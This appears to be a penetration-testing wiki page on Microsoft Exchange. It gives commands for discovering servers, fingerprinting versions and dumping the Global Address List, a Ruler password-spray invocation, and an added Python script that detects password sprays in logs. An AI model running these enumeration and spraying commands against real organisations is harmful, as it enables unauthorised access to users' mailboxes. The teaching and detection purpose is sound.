Exchange services
Theory
Microsoft Exchange Server is a mail server and calendaring server developed by Microsoft. It runs exclusively on Windows Server operating systems.
Practice
Enumeration
Discover Exchange Servers
We can use the following commands to discover Exchange servers across a large scope of subdomains:
$ cat subdomains.txt
sub1.example.com
sub2.example.ru
sub3.example.bz
$ for i in `cat subdomains.txt | rev | cut -d. -f1-2 | rev | sort -u`; do echo https://autodiscover.$i; done | httpx -silent -random-agent -fr -t 20 -sc -title -td -ip | grep Outlook | grep -oP '\d+\.\d+\.\d+\.\d+' | dnsx -silent -re -ptr
1.3.3.7 [mx1.example.com]
66.66.66.66 [mx2.example.ru]
123.123.123.123 [mx3.example.bz]
Enumerate Exchange Version
We can use the following commands to retrieve the Exchange build number and correlate it with the release dates:
curl -sSL https://<TARGET>/owa/auth/logon.aspx -k| grep favicon.ico
# OR
curl https://<TARGET>/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application -k | xmllint --format - | grep version
User Enumeration (GAL)
If access to a domain-joined computer or a corporate email account is obtained, the Global Address List (GAL) can be exported, allowing a list of usernames to be retrieved.
Ruler
Ruler (Go) can be used to retrieve the GAL using known credentials.
ruler -k -d target.domain -u user -p 'Passw0rd!' -e <EMAIL> --verbose abk dump -o gal.txt
global-address-list-owa
global-address-list-owa (Python) can also be used to export the GAL using known credentials.
python3 emailextract.py -i exch01.target.domain -u <EMAIL> -p 'P@ssword!'
Vulnerabilities
PrivExchange
ProxyLogon
ProxyShell
ProxyNotShell
Password Spray
A password spray is an attack that tries a single password against many accounts. This avoids the account lockouts that are triggered when multiple passwords are tried against a single account. More details on this page.
Ruler (Go) can be used to perform password spray attacks:
ruler -k --domain target.domain brute --users global_address_list.txt --passwords passwords.txt --verbose -a 4
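On the detection side, the pattern described above (many accounts, few guesses each, one source) can be found in authentication logs. The following is an added example, not part of the original page or of any tool it mentions; the log format, thresholds and function names are assumptions, and the sample lines are constructed.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample in an assumed normalised format: timestamp,source IP,user,result
SAMPLE_LOG = """\
2024-05-01T09:00:01,203.0.113.7,alice,FAIL
2024-05-01T09:00:03,203.0.113.7,bob,FAIL
2024-05-01T09:00:05,203.0.113.7,carol,FAIL
2024-05-01T09:00:07,203.0.113.7,dave,FAIL
2024-05-01T09:00:09,203.0.113.7,erin,FAIL
2024-05-01T09:20:11,203.0.113.7,erin,OK
2024-05-01T09:01:00,198.51.100.9,frank,FAIL
2024-05-01T09:01:05,198.51.100.9,frank,FAIL
2024-05-01T09:30:00,192.0.2.44,grace,FAIL
2024-05-01T11:30:00,192.0.2.44,heidi,FAIL
"""

def parse(log):
    for line in log.splitlines():
        ts, ip, user, result = line.strip().split(",")
        yield datetime.fromisoformat(ts), ip, user.lower(), result

def detect_spray(log, window=timedelta(minutes=10), min_users=5, max_per_user=2):
    """Return {source_ip: usernames} for sources that failed against at least min_users
    distinct accounts inside one window, with no account tried more than max_per_user times."""
    failures = defaultdict(list)
    for ts, ip, user, result in parse(log):
        if result == "FAIL":
            failures[ip].append((ts, user))
    alerts = {}
    for ip, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until it spans at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            counts = Counter(user for _, user in events[start:end + 1])
            if len(counts) >= min_users and max(counts.values()) <= max_per_user:
                alerts[ip] = sorted(counts)
                break
    return alerts

def compromised_after_spray(log, alerts):
    """(source, account) pairs that logged in successfully from a flagged source."""
    return sorted({(ip, u) for _, ip, u, r in parse(log) if r == "OK" and ip in alerts})

if __name__ == "__main__":
    hits = detect_spray(SAMPLE_LOG)
    print(hits, compromised_after_spray(SAMPLE_LOG, hits))
```

The `max_per_user` condition is what separates a spray from repeated guessing against one account (the second source in the sample), which lockout policy already covers.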
Resources